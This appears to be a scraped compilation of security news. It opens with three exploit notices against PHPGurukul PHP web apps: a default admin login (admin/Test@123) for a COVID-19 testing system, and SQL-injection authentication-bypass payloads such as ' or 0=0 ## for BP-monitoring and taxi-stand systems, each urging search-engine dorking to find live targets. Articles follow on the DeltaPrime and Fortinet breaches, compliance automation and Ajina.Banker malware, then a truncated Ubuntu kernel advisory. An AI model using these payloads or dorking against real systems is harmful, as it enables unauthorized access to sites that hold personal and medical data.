COVID19 Testing Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : COVID19 - Testing Management System 1.0 Insecure Settings Vulnerability                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/covid-tms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

COVID19 Testing Management System 1.0 Insecure Settings

BP Monitoring Management System version 1.0 version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : BP Monitoring Management System 1.0 Auth By Pass Vulnerability                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/bp-monitoring-management-system-using-php-and-mysql/                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer = 'or''='@gmail.com & PASs : ' or 0=0 ##[+] http://127.0.0.1/bpmms/edit-family-member.php?fmid=1Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

BP Monitoring Management System 1.0 SQL Injection

Auto/Taxi Stand Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Auto/Taxi Stand Management System 1.0 Auth By Pass Vulnerability                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/auto-taxi-stand-management-system-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer = ' or 0=0 ## & PASs : ' or 0=0 ##[+] http://127.0.0.1/atsms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Auto/Taxi Stand Management System 1.0 SQL Injection

DeltaPrime DeFi platform suffers a $5.98M hack on the Arbitrum chain due to a private key leak. The attack compromised several liquidity pools, and the team is working on asset recovery and minimizing user losses.

In the early hours of September 16, 2024, DeltaPrime, a prominent decentralized finance (**DeFi**) platform, announced that its Arbitrum-based protocol, DeltaPrime Blue, was exploited in a cyber attack that drained approximately $5.98 million.

According to an official tweet from DeltaPrime at 9:55 AM, the exploit occurred at 6:14 AM CET and was traced to a compromised private key. The team reassured users that the issue is limited to the **Arbitrum chain**, with the Avalanche-based DeltaPrime Red unaffected due to its use of multisig wallets and cold storage for added security.

The company emphasized that they are actively working on asset retrieval and that the platform’s insurance pool is expected to cover losses where possible. Additionally, DeltaPrime is exploring further measures to minimize user losses, pledging ongoing updates through social media and Discord.

> DeltaPrime Blue exploited, this is the current status:
> 
> At 6:14 AM CET DeltaPrime Blue (Arbitrum) was attacked and drained for $5.98M. This was due to a compromised private key, the source of which is currently under investigation.
> 
> DeltaPrime Red (Avalanche) is not vulnerable…
> 
> — DeltaPrime (@DeltaPrimeDefi) September 16, 2024

The attack was first flagged by Cyvers Alerts, a blockchain security platform, which detected suspicious transactions related to DeltaPrime Blue on the Arbitrum chain. In a tweet at 7:36 AM, Cyvers reported multiple suspicious transactions draining liquidity pools, such as DPUSDC, DPARB, and DPBTCb.

They noted that the attacker had already swapped large amounts of USDC for ETH, with the total loss estimated at $4.5 million at the time. An hour later, Cyvers updated their estimate, stating that the losses had increased to $5.93 million, confirming that the attacker had taken control of the private key for DeltaPrime’s admin wallet, allowing them to upgrade proxy contracts and direct them to malicious ones.

> 🚨ALERT🚨@DeltaPrimeDefi has faced a security incident on their admin keys.  
> Attacker had control on the private key of 0x40e4ff9e018462ce71fa34abdfa27b8c5e2b1afb  
> then he upgraded the proxy!
> 
> So far $5.93M has been drained!
> 
> Want to keep your company off our alerts radar? Learn… https://t.co/yOmNZJyp5l pic.twitter.com/lztFvXVmfI
> 
> — 🚨 Cyvers Alerts 🚨 (@CyversAlerts) September 16, 2024

In a comment to Hackread.com, **Meir Dolev,** CTO of CyVers stated _“_The hacker took control of the admin wallet for DeltaPrime’s proxy contracts, later upgrading these contracts to point to his malicious contract, which enabled the draining of the pools on the Arbitrum chain. The total loss is around $5.9 million USD._“_

As the investigation continues, DeltaPrime assures users that their funds on Avalanche remain secure, while they focus on resolving the situation on Arbitrum. Stay tuned, this article will be updated accordingly.

1.  **6 of the Best Crypto Bug Bounty Programs**
2.  **Crypto Scammer Returns $9.27M Out of $24M Crypto Theft**
3.  **Crypto Exchange FixedFloat Hacked: $26M in BTC, ETH Stolen**
4.  **Hackers Stole $59M of Crypto Via Malicious Google and X Ads**
5.  **Crypto losses reach $1.75 Billion in 2023; CeFi and Hacks Blamed**

DeltaPrime Suffers $5.98M Loss as Hacker Exploits Admin Key on Arbitrum

The incident is a reminder why organizations need to pay attention to how they store and secure data in SaaS and cloud environments.

Source: JHVEPhoto via Shutterstock

Fortinet has confirmed the compromise of data belonging to a "small number" of its customers, after a hacker using the somewhat colorful moniker "Fortibitch" leaked 440GB of the information via BreachForums this week.

The hacker claimed to have obtained the data from an Azure SharePoint site and alleges they leaked it after the company refused to negotiate with the individual on a ransom demand. The situation once again highlights the responsibility that companies have to secure data held in third-party cloud repositories, researchers say.

Fortinet itself has not specifically identified the source of the breach. But in a Sept. 12 advisory, the company said someone had gained "unauthorized access to a limited number of files stored on Fortinet’s instance of a third-party, cloud-based shared file drive."

The security vendor, one of the largest in the world by market cap, identified the issue as impacting less than 0.3% of its more than 775,000 customers worldwide, which would place the number of affected organizations at around 2,325.

Fortinet said it had seen no signs of malicious activity around the compromised data. "Fortinet immediately executed on a plan to protect customers and communicated directly with customers as appropriate and supported their risk mitigation plans," the security vendor noted in the advisory. "The incident did not involve any data encryption, deployment of ransomware, or access to Fortinet’s corporate network." Fortinet said it does not expect the incident to have any material impact on its operations or finances.

In a threat intelligence report shared with Dark Reading, CloudSEK said it had observed a threat actor using the Fortibitch handle leaking what appeared to include not just customer data, but also financial and marketing documents, product information, HR data from India, and some employee data.

"The actor attempted to extort the company but, after unsuccessful negotiations, released the data," CloudSEK said.  The company surmised that the hacker would have attempted to sell the data first, if it had been of any true value.

Fortinet did not confirm or deny if the hacker had attempted to engage with the company on the stolen data.

The hacker's post on BreachForums included somewhat context-free references to Fortinet's acquisitions of Lacework and NextDLP. It also referenced a few other threat actors, the most interesting of whom is a Ukrainian outfit tracked as DC8044. "There are no direct links between Fortibitch and DC8044, but the tone suggests a history between the two," according to CloudSEK. "Based on the available information, we can ascertain with medium confidence that the threat actor is based out of Ukraine."

**Breach a Reminder of Cloud Data Exposure Risks**

The Fortinet compromise — though apparently not too major — is a reminder of the heightened data exposure risks to enterprise organizations when using software-as-a-service (SaaS) and other cloud services without the appropriate guardrails. A recent scan by Metomic of some 6.5 million Google Drive files showed more than 40% of them containing sensitive data, including employee data and spreadsheets containing passwords.

Often, organizations stored the data on Google Drive files with little protection. More than one-third (34.2%) of the scanned files were shared with external email addresses, and more than 350,000 files had been shared publicly.

Rich Vibert, CEO and founder of Metomic, says there are three fundamental mistakes organizations make when it comes to protecting data in cloud environments: not using multifactor authentication (MFA) to control access to SaaS apps; giving employees too much access to folders and sensitive assets within the app itself; and storing sensitive data for too long.

It's unclear yet how the hacker might have accessed the data from Fortinet's SharePoint environment. But one likely scenario is that the attacker gained access to valid login credentials, via phishing for instance, and then logged in and exfiltrated data from SharePoint and similar environments, says Koushik Pal, threat intelligence reporter at CloudSEK. Information stealers are also a "really common" attack vector, Pal notes.

**Rethinking Cloud Security**

"Typically, developers should use environment variables, vaults, or encrypted storage for sensitive information, and avoid hardcoding credentials in source code," Pal says. Often developers hardcode access credentials like API keys, username and password into the source code and inadvertently push the code into a public or unsecured private repository from where they can be accessed relatively easily.

"Organizations should make MFA mandatory for accessing SharePoint and other critical systems to prevent unauthorized access even if credentials are compromised," Pal explains. "Monitor repositories on a regular basis for exposed credentials, sensitive data, or misconfigurations, and enforce security best practices across all teams."

Akhil Mittal, senior manager of cybersecurity at Synopsys Software Integrity Group, says incidents like the one Fortinet experienced show why it's a mistake for organizations to leave security around their cloud assets entirely to cloud service providers. "Organizations should rethink how they store customer data in shared drives, ensuring critical information is kept separate from less sensitive files," he says.

It's a good idea too to encrypt sensitive data both in transit and at rest, to mitigate damage even if attackers gain access. Mittal perceives continuous monitoring of cloud assets as fundamental to protecting them. "Applying zero-trust principles to third-party platforms also ensures no external service is trusted automatically, reducing the risk of unauthorized access," he adds.

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa, and forced to spend the night in jail — just for doing their pen-testing jobs. Listen now!

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Fortinet Confirms Customer Data Breach via Third Party

In this case study, a CISO helps a B2B marketing automation company straighten out its manual compliance process by automating it.

Source: Moodboard Stock Photography via Alamy Stock Photo

Like many tech companies, Metadata.io built its B2B marketing automation business from the ground up, consistently adding key functions like personalization, prospect data enrichment, and creative micro-targeting strategies.

As it was growing, the company did its best to comply with critical attestations and standards like SOC 2 Type II and ISO 27001. But most of the focus was on building the company's core assets, not thinking of ways to streamline and automate compliance.

These frameworks aren't easy to comply with. Although they share about 60% of the same controls, they are completely different frameworks and require different processes.

The company did the best it could to comply with these controls with largely manual processes. All controls were written in spreadsheets, with no owners of specific controls and no way to ensure version control. Controls were stored in nested folders and Google Drive.

After a few years, it became clear that the compliance process simply wasn't working. To address the issue and shore up security in general, Metadata.io hired veteran CISO Raymond Taft.

**A Tangle of Manual Compliance**

"When I first got here, the company was just shy of about three months of its Series B fundraiser. It was still a very scrappy company," Taft says.

The first order of business was addressing the haphazard way Metadata.io was handling compliance. The current, largely manual system made it difficult to track compliance and ensure that controls were continuously monitored.

"Every single background check and confidentiality agreement had to be marked in a folder. It can take an enormous amount of time if you're continuously grabbing evidence for every one of those controls and putting them in these folders," Taft says. "It ends up being a nightmare to collect because you have to go back to that spreadsheet to, for example, collect evidence on specific need to things on specific days."

It was also labor-intensive, taking six people to do nothing but evidence collection. That's a lot of people when the total employee count is only 40.

Taft also discovered that the company was missing controls around background checks, performance reviews, and continuous monitoring of its cloud environment. Perhaps even more concerning was the haphazard way that data loss prevention, and security in general, was monitored and controlled.

"I knew within the first three months of working here that it would never scale as the company planned to grow to three or four times its current size," he says.

Without automation, Taft could see the writing on the wall. In addition to losing customer trust, the company would have had to continue spending a lot of money on evidence-gathering, and may have ended up outsourcing the entire function.

**Automating Compliance via Outsourcing**

Automating the compliance function was the only way Taft could see to gain control and ensure that controls were being consistently met. He didn't think it was a good idea to try to automate the function internally; not only was it not a core competency of the company, but it would incur a significant learning curve and take a significant amount of time.

Compliance automation is a good option for many enterprises, says Rik Turner, a cybersecurity analyst at Omdia.

"If your business spans multiple verticals and/or geographies, it's likely that you will be subject to multiple compliance requirements. This makes complying with them all a time- and resource-consuming undertaking, so automating your compliance activities represents significant potential savings," he says.

In addition, a typical human-driven compliance project is carried out on a monthly, quarterly, or even semi-annual basis, which means that it provides only a point-in-time view of compliance at the moment it was completed. An automated approach, on the other hand, holds the promise of continuous checking and alerting as soon as a change to the infrastructure or business processes risks slipping out of compliance, he adds.

Taft wanted a full-stack automation tool that would be able to configure policies, identify control failures or other issues, and quickly incorporate new controls. He also wanted to ensure that the solution could integrate with the stacks Metadata.io used most commonly. That included Jira, AWS, and GCP, along with its background check provider and HR platform.

"We knew if we could plug into those and continuously gather evidence, we could knock off more than 80% of our total evidence-gathering requirements for the year," he says.

There are plenty of tools that meet the requirements around continuous compliance, Turner says. More specifically, he notes that vertical and geographical breadth of coverage is key. But most importantly, he adds, potential buyers should check whether a tool that measures compliance stops at the alerting stage or can actually remediate situations when it detects that a change has caused the organization to slip out of compliance.

With these issues in mind, Taft settled on Drata for automated compliance monitoring. The tool automates evidence collection from all of its tooling, querying it every second of the day and reporting on status. It also communicates the state of Metadata.io's compliance program to auditors through a portal that also allows them to ask questions.

**Building on Good Results**

Since the implementation, Metadata.io's internal compliance team has been reduced to four people, even though the company has now grown to more than 100 employees. Taft says companies Metadata.io's size typically have compliance teams of 10 to 15.

The company also realized an unanticipated benefit: being able to fold some of its services into Drata via its trust center. Before, the company was paying $30,000 per year to upload its documentation to a trust center, where customers could access it. Drata's solution includes a trust center, saving the company that money.

That's just part of the cost savings. Taft says that all told, automated compliance has resulted in a 6x reduction in cost.

Time savings also has been substantial. For SOC 2 Type II and ISO 27001 compliance audits alone, for example, prep time went from six weeks to two weeks. Taft says that he recently met with the company's auditors for a total of five hours for the audit period. Last year that took four days.

With SOC 2 Part II and ISO 27001 fully automated and under control, Taft's next project is expanding into other compliance projects like ISO 27701, which is focused on data privacy, along with other frameworks.

The key to expanding, he says, is leveraging the automation tool's approach to control mappings and its ability to cross-map.

"There are dozens of frameworks, and they all share a little bit of DNA with each other," Taft explains. "The cross-mappings could be horrendous and could take months. For example, how does ISO 27701 relate to privacy for SOC 2?"

Drata's control and framework mapping enables users to click on a framework and see which controls apply to it. With that information, it's fairly simple to determine what's needed in terms of human resources to adopt the new framework, he says, and whether it makes sense for the business to move forward with it.

**About the Author**

Contributing Writer, Dark Reading

Karen D. Schwartz is a technology and business writer with more than 20 years of experience. She has written on a broad range of technology topics for publications including ITProToday, CIO, InformationWeek, GCN, FCW, FedTech, BizTech, eWeek, and Government Executive.

Compliance Automation Pays Off for a Growing Company

A new Android malware called Trojan Ajina.Banker is targeting Central Asia – Discover how this malicious malware disguises…

A new Android malware called Trojan Ajina.Banker is targeting Central Asia – Discover how this malicious malware disguises itself as legitimate apps to steal banking information and intercept 2FA messages. Learn about the tactics used by the attackers and how to protect yourself from this growing threat.

Central Asia has become the target of a malicious new campaign distributing Android malware dubbed “Ajina.Banker.” Discovered by Group-IB in May 2024, Ajina.Banker has been wreaking havoc since November 2023 and around 1,400 unique variants of the malware were identified by researchers.

The malware is named after a malevolent Uzbek mythical spirit known for deception, shape-shifting, and chaos. Ajina.Banker targets unsuspecting users by masquerading as trusted applications like banking services, government portals, and everyday utilities “to maximize infection rates and entice people to download and run the malicious file, thereby compromising their devices.”

The malware primarily spreads through social engineering tactic on messaging platforms like Telegram. Attackers create numerous accounts to distribute malicious links and files disguised as enticing offers, promotions, or even local tax authority apps. Users lured by the promise of “lucrative rewards” or “exclusive access” unknowingly download and install the malware, compromising their devices.

The attackers also employ a multi-pronged approach, sending messages with just the malicious file attached, exploiting user curiosity. Additionally, they share links to channels hosting the malware, bypassing security measures in place on some community chats.

Ajina used themed messages and localized promotion strategies to create a sense of urgency and excitement in regional community chats, urging users to click on links or download files without suspecting malicious intent. These campaigns were conducted across multiple accounts, sometimes simultaneously, indicating a coordinated effort.

While primarily targeting users in Uzbekistan, Ajina.Banker’s reach extends beyond borders. The malware collects information on installed financial applications from various countries, including Armenia, Azerbaijan, Iceland, and Russia. Additionally, it gathers SIM card details and intercepts incoming SMS messages, potentially capturing 2FA codes for financial accounts.

The malware exhibits a concerning level of adaptability. The analysis reveals two distinct versions – com.example.smshandler and org.zzzz.aaa – suggesting ongoing development. Newer versions showcase additional functionalities, including the ability to steal user-provided phone numbers, bank card details, and PIN codes.

Group-IB’s investigation suggests Ajina.Banker operates on an affiliate program model. A core group manages the infrastructure, while a network of affiliates handles distribution and infection chains, likely incentivized by a share of the stolen funds.

To protect yourself and your devices from Ajina.Banker and similar threats, be cautious of unsolicited messages and downloads, stick to trusted app stores like Google Play Store, scrutinize app permissions, install security software, and stay updated on the latest malware threats and best practices for mobile security.

Rocky Cole, Co-Founder and COO of mobile device security company iVerify shared his comments about this cunning new campaign with Hackread.com:

“Credential theft is the number one action being taken by threat actors. It’s so easy to steal credentials on phones where smaller screens, lower attention spans, lack of training, and the mixing of personal and professional use cases put people at risk. This new Android malware is just a continuation of that trend and a prime example of why phones should be running EDR platforms to detect malicious APKs and social engineering attempts.”

1.  **Hackers using Google Sites to spread banking malware**
2.  **Google reveals spyware attack on Android, iOS, and Chrome**
3.  **Scylla Ad Fraud on iOS, Android Users Halted by Apple, Google**
4.  **V3B Phishing Kit Steals Logins and OTPs from EU Banking Users**
5.  **Android Banking Malware FjordPhantom Steals Via Virtualization**

New Android Malware Ajina.Banker Steals 2FA Codes, Spreads via Telegram

Ubuntu Security Notice 7007-1 - Chenyuan Yang discovered that the CEC driver driver in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kernel did not properly check for the device to be enabled before writing. A local attacker could possibly use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-7007-1September 13, 2024linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gke,linux-gkeop, linux-gkeop-5.15, linux-hwe-5.15, linux-ibm,linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm, linux-nvidia,linux-oracle, linux-raspi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-intel-iotg: Linux kernel for Intel IoT platforms- linux-kvm: Linux kernel for cloud environments- linux-nvidia: Linux kernel for NVIDIA systems- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernel- linux-intel-iotg-5.15: Linux kernel for Intel IoT platformsDetails:Chenyuan Yang discovered that the CEC driver driver in the Linux kernelcontained a use-after-free vulnerability. A local attacker could use thisto cause a denial of service (system crash) or possibly execute arbitrarycode. (CVE-2024-23848)Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kerneldid not properly check for the device to be enabled before writing. A localattacker could possibly use this to cause a denial of service.(CVE-2024-25741)It was discovered that the JFS file system contained an out-of-bounds readvulnerability when printing xattr debug information. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2024-40902)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM64 architecture;  - M68K architecture;  - MIPS architecture;  - PowerPC architecture;  - RISC-V architecture;  - x86 architecture;  - Block layer subsystem;  - Cryptographic API;  - Accessibility subsystem;  - ACPI drivers;  - Serial ATA and Parallel ATA drivers;  - Drivers core;  - Bluetooth drivers;  - Character device driver;  - CPU frequency scaling framework;  - Hardware crypto device drivers;  - Buffer Sharing and Synchronization framework;  - DMA engine subsystem;  - FPGA Framework;  - GPIO subsystem;  - GPU drivers;  - Greybus drivers;  - HID subsystem;  - HW tracing;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - Input Device (Mouse) drivers;  - Macintosh device drivers;  - Multiple devices driver;  - Media drivers;  - VMware VMCI Driver;  - Network drivers;  - Near Field Communication (NFC) drivers;  - NVME drivers;  - Pin controllers subsystem;  - PTP clock framework;  - S/390 drivers;  - SCSI drivers;  - SoundWire subsystem;  - Greybus lights staging drivers;  - Media staging drivers;  - Thermal drivers;  - TTY drivers;  - USB subsystem;  - DesignWare USB3 driver;  - Framebuffer layer;  - ACRN Hypervisor Service Module driver;  - eCrypt file system;  - File systems infrastructure;  - Ext4 file system;  - F2FS file system;  - JFFS2 file system;  - JFS file system;  - NILFS2 file system;  - NTFS3 file system;  - SMB network file system;  - IOMMU subsystem;  - Memory management;  - Netfilter;  - BPF subsystem;  - Kernel debugger infrastructure;  - DMA mapping infrastructure;  - IRQ subsystem;  - Tracing infrastructure;  - 9P file system network protocol;  - B.A.T.M.A.N. meshing protocol;  - CAN network layer;  - Ceph Core library;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - MAC80211 subsystem;  - Multipath TCP;  - NET/ROM layer;  - NFC subsystem;  - Open vSwitch;  - Network traffic control;  - TIPC protocol;  - TLS protocol;  - Unix domain sockets;  - Wireless networking;  - XFRM subsystem;  - ALSA framework;  - SoC Audio for Freescale CPUs drivers;  - Kirkwood ASoC drivers;(CVE-2024-40961, CVE-2024-38597, CVE-2024-39468, CVE-2024-36978,CVE-2024-42161, CVE-2024-38573, CVE-2024-40905, CVE-2024-42094,CVE-2024-36894, CVE-2024-40914, CVE-2024-40956, CVE-2024-42106,CVE-2024-38610, CVE-2024-39506, CVE-2024-42098, CVE-2024-42232,CVE-2024-38590, CVE-2024-39488, CVE-2024-42127, CVE-2024-41006,CVE-2024-42131, CVE-2024-41005, CVE-2024-40963, CVE-2024-38559,CVE-2024-42130, CVE-2024-37078, CVE-2024-42082, CVE-2024-40984,CVE-2024-38560, CVE-2024-42090, CVE-2024-33621, CVE-2024-40974,CVE-2024-42115, CVE-2024-40971, CVE-2024-40943, CVE-2024-38627,CVE-2024-38548, CVE-2024-40934, CVE-2024-38579, CVE-2024-38558,CVE-2024-39495, CVE-2023-52884, CVE-2024-42225, CVE-2024-38659,CVE-2024-40927, CVE-2024-40967, CVE-2024-38624, CVE-2024-38583,CVE-2024-41047, CVE-2024-38623, CVE-2024-39509, CVE-2024-36971,CVE-2024-42120, CVE-2024-38589, CVE-2024-36270, CVE-2024-42105,CVE-2024-36032, CVE-2024-42101, CVE-2024-40908, CVE-2024-42089,CVE-2024-39482, CVE-2024-38662, CVE-2024-41007, CVE-2024-38635,CVE-2023-52887, CVE-2024-40912, CVE-2024-41027, CVE-2024-38598,CVE-2024-38381, CVE-2024-39503, CVE-2024-39301, CVE-2024-40988,CVE-2024-41000, CVE-2024-39507, CVE-2024-35247, CVE-2024-39277,CVE-2024-42229, CVE-2024-42085, CVE-2024-35927, CVE-2024-42224,CVE-2024-38567, CVE-2024-42097, CVE-2024-41049, CVE-2024-39466,CVE-2024-40957, CVE-2024-40978, CVE-2024-42093, CVE-2024-40937,CVE-2024-41034, CVE-2024-41048, CVE-2024-39471, CVE-2024-39502,CVE-2024-38555, CVE-2024-40970, CVE-2024-36972, CVE-2024-40995,CVE-2024-42154, CVE-2024-40916, CVE-2024-39505, CVE-2024-39475,CVE-2024-38599, CVE-2024-38596, CVE-2024-39493, CVE-2024-42124,CVE-2024-38549, CVE-2024-42084, CVE-2024-40942, CVE-2024-42077,CVE-2024-42152, CVE-2024-40904, CVE-2024-31076, CVE-2024-40960,CVE-2024-41035, CVE-2024-40945, CVE-2024-38605, CVE-2024-42140,CVE-2024-41041, CVE-2024-36014, CVE-2024-38612, CVE-2024-41092,CVE-2024-38546, CVE-2024-40902, CVE-2024-42068, CVE-2024-42121,CVE-2024-42236, CVE-2024-34777, CVE-2024-39467, CVE-2024-42087,CVE-2024-39501, CVE-2024-40980, CVE-2024-38550, CVE-2024-42223,CVE-2024-38607, CVE-2024-42247, CVE-2024-41046, CVE-2024-42080,CVE-2024-40901, CVE-2024-38571, CVE-2024-39480, CVE-2024-42070,CVE-2024-41093, CVE-2024-42148, CVE-2024-38601, CVE-2024-39500,CVE-2024-41097, CVE-2024-38565, CVE-2024-38661, CVE-2024-38615,CVE-2024-41040, CVE-2024-34027, CVE-2024-37356, CVE-2024-42157,CVE-2024-40941, CVE-2024-38634, CVE-2024-41004, CVE-2024-38780,CVE-2024-38552, CVE-2024-39276, CVE-2024-38618, CVE-2024-38588,CVE-2024-42086, CVE-2024-41087, CVE-2024-38582, CVE-2024-40932,CVE-2024-39489, CVE-2024-40968, CVE-2024-42119, CVE-2024-42137,CVE-2024-40929, CVE-2024-38591, CVE-2024-36489, CVE-2022-48772,CVE-2024-42153, CVE-2024-40959, CVE-2024-40987, CVE-2024-36015,CVE-2024-41044, CVE-2024-41002, CVE-2024-42109, CVE-2024-38587,CVE-2024-36286, CVE-2024-41055, CVE-2024-39469, CVE-2024-39487,CVE-2024-38580, CVE-2024-38619, CVE-2024-38613, CVE-2024-42145,CVE-2024-41095, CVE-2024-40958, CVE-2024-40911, CVE-2024-42102,CVE-2024-33847, CVE-2024-36974, CVE-2024-40994, CVE-2024-38633,CVE-2024-40981, CVE-2024-40983, CVE-2024-42096, CVE-2024-42104,CVE-2024-42092, CVE-2024-40954, CVE-2024-38637, CVE-2024-42240,CVE-2024-38621, CVE-2024-38578, CVE-2024-38547, CVE-2024-39490,CVE-2024-42076, CVE-2024-42244, CVE-2024-39499, CVE-2024-38586,CVE-2024-41089, CVE-2024-40976, CVE-2024-42095, CVE-2024-40931,CVE-2024-40990)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  linux-image-5.15.0-1052-gkeop   5.15.0-1052.59  linux-image-5.15.0-1062-ibm     5.15.0-1062.65  linux-image-5.15.0-1062-raspi   5.15.0-1062.65  linux-image-5.15.0-1064-intel-iotg  5.15.0-1064.70  linux-image-5.15.0-1064-nvidia  5.15.0-1064.65  linux-image-5.15.0-1064-nvidia-lowlatency  5.15.0-1064.65  linux-image-5.15.0-1066-gke     5.15.0-1066.72  linux-image-5.15.0-1066-kvm     5.15.0-1066.71  linux-image-5.15.0-1067-oracle  5.15.0-1067.73  linux-image-5.15.0-1068-gcp     5.15.0-1068.76  linux-image-5.15.0-1069-aws     5.15.0-1069.75  linux-image-5.15.0-121-generic  5.15.0-121.131  linux-image-5.15.0-121-generic-64k  5.15.0-121.131  linux-image-5.15.0-121-generic-lpae  5.15.0-121.131  linux-image-aws-lts-22.04       5.15.0.1069.69  linux-image-gcp-lts-22.04       5.15.0.1068.64  linux-image-generic             5.15.0.121.121  linux-image-generic-64k         5.15.0.121.121  linux-image-generic-lpae        5.15.0.121.121  linux-image-gke                 5.15.0.1066.65  linux-image-gke-5.15            5.15.0.1066.65  linux-image-gkeop               5.15.0.1052.51  linux-image-gkeop-5.15          5.15.0.1052.51  linux-image-ibm                 5.15.0.1062.58  linux-image-intel-iotg          5.15.0.1064.64  linux-image-kvm                 5.15.0.1066.62  linux-image-nvidia              5.15.0.1064.64  linux-image-nvidia-lowlatency   5.15.0.1064.64  linux-image-oracle-lts-22.04    5.15.0.1067.63  linux-image-raspi               5.15.0.1062.60  linux-image-raspi-nolpae        5.15.0.1062.60  linux-image-virtual             5.15.0.121.121Ubuntu 20.04 LTS  linux-image-5.15.0-1052-gkeop   5.15.0-1052.59~20.04.1  linux-image-5.15.0-1064-intel-iotg  5.15.0-1064.70~20.04.1+1  linux-image-5.15.0-1068-gcp     5.15.0-1068.76~20.04.1  linux-image-5.15.0-1069-aws     5.15.0-1069.75~20.04.1  linux-image-5.15.0-121-generic  5.15.0-121.131~20.04.1  linux-image-5.15.0-121-generic-64k  5.15.0-121.131~20.04.1  linux-image-5.15.0-121-generic-lpae  5.15.0-121.131~20.04.1  linux-image-aws                 5.15.0.1069.75~20.04.1  linux-image-gcp                 5.15.0.1068.76~20.04.1  linux-image-generic-64k-hwe-20.04  5.15.0.121.131~20.04.1  linux-image-generic-hwe-20.04   5.15.0.121.131~20.04.1  linux-image-generic-lpae-hwe-20.04  5.15.0.121.131~20.04.1  linux-image-gkeop-5.15          5.15.0.1052.59~20.04.1  linux-image-intel               5.15.0.1064.70~20.04.1  linux-image-intel-iotg          5.15.0.1064.70~20.04.1  linux-image-oem-20.04           5.15.0.121.131~20.04.1  linux-image-oem-20.04b          5.15.0.121.131~20.04.1  linux-image-oem-20.04c          5.15.0.121.131~20.04.1  linux-image-oem-20.04d          5.15.0.121.131~20.04.1  linux-image-virtual-hwe-20.04   5.15.0.121.131~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7007-1  CVE-2022-48772, CVE-2023-52884, CVE-2023-52887, CVE-2024-23848,  CVE-2024-25741, CVE-2024-31076, CVE-2024-33621, CVE-2024-33847,  CVE-2024-34027, CVE-2024-34777, CVE-2024-35247, CVE-2024-35927,  CVE-2024-36014, CVE-2024-36015, CVE-2024-36032, CVE-2024-36270,  CVE-2024-36286, CVE-2024-36489, CVE-2024-36894, CVE-2024-36971,  CVE-2024-36972, CVE-2024-36974, CVE-2024-36978, CVE-2024-37078,  CVE-2024-37356, CVE-2024-38381, CVE-2024-38546, CVE-2024-38547,  CVE-2024-38548, CVE-2024-38549, CVE-2024-38550, CVE-2024-38552,  CVE-2024-38555, CVE-2024-38558, CVE-2024-38559, CVE-2024-38560,  CVE-2024-38565, CVE-2024-38567, CVE-2024-38571, CVE-2024-38573,  CVE-2024-38578, CVE-2024-38579, CVE-2024-38580, CVE-2024-38582,  